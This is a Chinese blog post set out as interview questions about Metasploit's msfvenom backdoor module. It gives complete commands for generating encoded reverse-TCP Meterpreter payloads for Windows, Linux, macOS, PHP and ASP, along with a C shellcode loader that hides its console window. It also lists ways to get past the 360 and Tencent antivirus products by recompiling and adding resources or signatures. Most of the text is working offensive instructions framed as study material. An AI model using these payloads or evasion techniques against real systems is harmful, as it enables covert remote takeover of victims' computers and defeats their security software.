MSF后门生成模块 面试考题

Posted 安全界 的彭于晏

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MSF后门生成模块 面试考题相关的知识,希望对你有一定的参考价值。

1. 后门生成模块的作用是什么?

			维持访问,持续控制

2. MsFvenom支持生成的脚本有哪些?

			使用命令:MsFvenom -l formats查看支持的脚本列表

3. 如何查看msfvenom支持的payload?

			使用命令:msfvenom -l payloads查看支持的payload

4. 如何查看msfvenom支持的编码器?

		使用命令:msfvenom -l encoders查看支持的所有编码器

5. Msfvenom -b 参数的作用是什么?

		删除生成shellcode中的一些无法字符

6. 什么是shellcode?

		Shellcode也就是利用代码

7. Msfvenom -i参数的作用是什么?

		支持编码次数,也就是类似于加密的多少次

8. Msfvenom导出生成的脚本的方式有那种?

		我们可以使用-o参数,或者是“>>”导出文件名

9. 在生成木马脚本的时候指定目标系统和目标架构的作用是什么?

		    生成的脚本的准确性,有些脚本我们生成之后可能无法在对方系统运行

10. Msfvenom生成后门文件的流程是什么?

		1.生成后门文件在对方主机上执行或者触发 2.本地监控设置的端口,然后对方上线即可控制对方主机

11. “msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.88.134 lport=1250 -f exe > 2301.exe ” 这句代码的意思是什么?

		使用msfvenom创建木马文件,-p指定payload为windows/meterpreter/reverse_tcp,-e 指定编码器为x86/shikata_ga_nai,-i指定编码次数为5,设置本地IP地址和端口,-f指定导出文件类型,> 导出为2301.exe文件

12. 在监听的时候我们使用什么模块?

		使用模块:use exploit/multi/handler

13. 在监听的时候我们应该注意什么?

		当我们选择了监听模块,然后呢,设置payload的时候要注意使用对应的payload,也就是我们生成木马文件所使用的payload

14. 常见的后门生成模式有哪些?

		根据需求来,一般来说有php,asp,Windows,linux,mac,powershell等等。

15. 常见的后门生成例子?

			1.    Windows
			Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\\back.exe 
			Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\\back.exe
			 
			2. Linux
			msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
			 
			3. MAC
			msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
			 
			4.  PHP
			msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
			 
			5.  Asp
			msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
			 
			6. Aspx
			msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

16. 安装vc++6.0的作用是什么?

		编译我们的C语言的数组,编译成exe可执行文件

17. 如何生成C语言数组的后门?

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\\x00’ lhost=192.168.88.134 lport=1250 -f c
指定文件格式为c语言即可或是 -o 导出保存为c语言的脚本文件

18. 如何使用Vc++6.0编译我们所生成的C语言数组文件?

	#1.	创建一个C语言项目:打开软件 – 文件 -新建 - win32 application -一个简单的32为C语言程序
	#2.	找到左下角的fileview,source files目录修改你创建的名字的.cpp程序
	#3.	复制:编译文件内容:
	#include "stdafx.h"
	#include <stdio.h>
	#pragma comment( linker, "/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"")
	unsigned char buf[] =
	(这里放生成好的数组)
	main()
	{
	((void(*)(void))&buf)();
	}

	#4.	然后组建 – 先编译stdafx.cpp文件,在编译你的.cpp,生成木马
	#5.	然后扫描测试即可

19. 绕过360软件的思路是什么?

	通过msfvenom所生成的C语言,然后编译,这样的话,特征就被去掉了。然后绕过

20. 绕过腾讯管家的思路是什么?

	通过添加资源文件来改变特征码,从而去绕过,如果被查杀了,那么我们就添加一些东西,例如签名,版权,图标等等信息

21. 第一次绕过了,为什么第二次会被拦截?

	因为,你上传过你的木马后门,然后防护软件进行分析,
	然后第二次你同样去做,就会拦截了。这是不断对抗的,
	所以方式方法不一定只有一种,会有多种

以上是关于MSF后门生成模块 面试考题的主要内容,如果未能解决你的问题,请参考以下文章

问题1 kali Linux. 我用msf生成了后门exe反弹马,发到测试主机,成功反弹后,发现

Kali利用msf渗透Windows电脑(超详细)

20145235李涛《网络对抗》Exp5 MSF基础应用

20155218《网络对抗》Exp3 免杀原理与实践

免杀后门之MSF&Veil-Evasion的完美结合

20174321王柏舟-Exp6-MSF基础应用